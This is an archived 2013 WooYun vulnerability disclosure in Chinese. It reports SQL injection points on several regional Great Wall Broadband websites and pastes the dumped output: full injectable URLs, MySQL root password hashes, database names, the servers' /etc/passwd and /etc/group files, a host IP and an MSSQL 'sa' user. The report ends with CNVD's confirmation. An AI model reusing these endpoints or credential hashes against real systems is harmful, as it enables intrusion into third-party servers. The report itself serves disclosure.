乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-05-09: 细节已通知厂商并且等待厂商处理中 2013-05-12: 厂商已经确认,细节仅向厂商公开 2013-05-22: 细节向核心白帽子及相关领域专家公开 2013-06-01: 细节向普通白帽子公开 2013-06-11: 细节向实习白帽子公开 2013-06-23: 细节向公众公开
................
.................
【厦门市】注入点http://www.xmgwbn.com/job/main.php?id=36 Sql Version: 5.0.18Current DB: xmgwbnSystem User: root@localhostDB User & Pass: root:*A67B7A9CD1A06791800F1768B296A5B2A1C02182:localhost root::xmgwbn.com ::xmgwbn.com ::localhost hullz:*F26FC8E6CED3A65125886E17250FE574260124D4:localhostData Bases: information_schema cjvod mysql noevil test xmgwbn xmgwbnweb【/etc/passwd】# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $#root:*:0:0:Charlie &:/root:/bin/cshtoor:*:0:0:Bourne-again Superuser:/root:daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologinoperator:*:2:5:System &:/:/usr/sbin/nologinbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologintty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologinkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologingames:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologinnews:*:8:8:News Subsystem:/:/usr/sbin/nologinman:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologinsshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologinsmmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologinmailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologinbind:*:53:53:Bind Sandbox:/:/usr/sbin/nologinproxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologinuucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucicopop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologinwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologinnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologinmysql:*:1001:1001:User &:/home/mysql:/bin/shzabbix:*:1002:1002:User &:/home/zabbix:/usr/sbin/nologin【/etc/group】# $FreeBSD: src/etc/group,v 1.32.2.1 2006/03/06 22:23:10 rwatson Exp $#wheel:*:0:rootdaemon:*:1:kmem:*:2:sys:*:3:tty:*:4:operator:*:5:rootmail:*:6:bin:*:7:news:*:8:man:*:9:games:*:13:staff:*:20:sshd:*:22:smmsp:*:25:mailnull:*:26:guest:*:31:bind:*:53:proxy:*:62:authpf:*:63:_pflogd:*:64:_dhcp:*:65:uucp:*:66:dialer:*:68:network:*:69:audit:*:77:www:*:80:nogroup:*:65533:nobody:*:65534:mysql:*:1001:zabbix:*:1002:
Sql Version: 5.0.18Current DB: xmgwbnSystem User: root@localhostDB User & Pass: root:*A67B7A9CD1A06791800F1768B296A5B2A1C02182:localhost root::xmgwbn.com ::xmgwbn.com ::localhost hullz:*F26FC8E6CED3A65125886E17250FE574260124D4:localhostData Bases: information_schema cjvod mysql noevil test xmgwbn xmgwbnweb【/etc/passwd】# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $#root:*:0:0:Charlie &:/root:/bin/cshtoor:*:0:0:Bourne-again Superuser:/root:daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologinoperator:*:2:5:System &:/:/usr/sbin/nologinbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologintty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologinkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologingames:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologinnews:*:8:8:News Subsystem:/:/usr/sbin/nologinman:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologinsshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologinsmmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologinmailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologinbind:*:53:53:Bind Sandbox:/:/usr/sbin/nologinproxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologinuucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucicopop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologinwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologinnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologinmysql:*:1001:1001:User &:/home/mysql:/bin/shzabbix:*:1002:1002:User &:/home/zabbix:/usr/sbin/nologin【/etc/group】# $FreeBSD: src/etc/group,v 1.32.2.1 2006/03/06 22:23:10 rwatson Exp $#wheel:*:0:rootdaemon:*:1:kmem:*:2:sys:*:3:tty:*:4:operator:*:5:rootmail:*:6:bin:*:7:news:*:8:man:*:9:games:*:13:staff:*:20:sshd:*:22:smmsp:*:25:mailnull:*:26:guest:*:31:bind:*:53:proxy:*:62:authpf:*:63:_pflogd:*:64:_dhcp:*:65:uucp:*:66:dialer:*:68:network:*:69:audit:*:77:www:*:80:nogroup:*:65533:nobody:*:65534:mysql:*:1001:zabbix:*:1002:
【广州市】注入点:http://point.gzgwbn.com.cn/news.aspx?ncid=1 难以忍受解表时间 就搁在这儿
难以忍受解表时间 就搁在这儿
【东莞市】注入点:http://www.dggwbn.net.cn/MsgList.aspx?msg=1Target: http://www.dggwbn.net.cn/MsgList.aspx?msg=1Host IP: 211.161.63.226Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETDB Server: MsSQL no errorResp. Time(avg): 229 msCurrent User: dboCurrent DB: EponSystem User: saHost Name: PBSCK-DF38539FAServer Name: DGPBSGD02 master tempdb model msdb ReportServer ReportServerTempDB Epon Epon_Bak 一堆表 未深入
一堆表 未深入
危害等级:高
漏洞Rank:16
确认时间:2013-05-12 23:50
CNVD确认并复现所述情况,已在10日下午较晚些时候终于联系上长城宽带总部联系人,与http://www.wooyun.org/bugs/wooyun-2013-023280事件一并交由其处置。该事件与http://www.wooyun.org/bugs/wooyun-2013-023280相比,部分系统可提权,rank较高,按多个案例进行评分,rank 16
暂无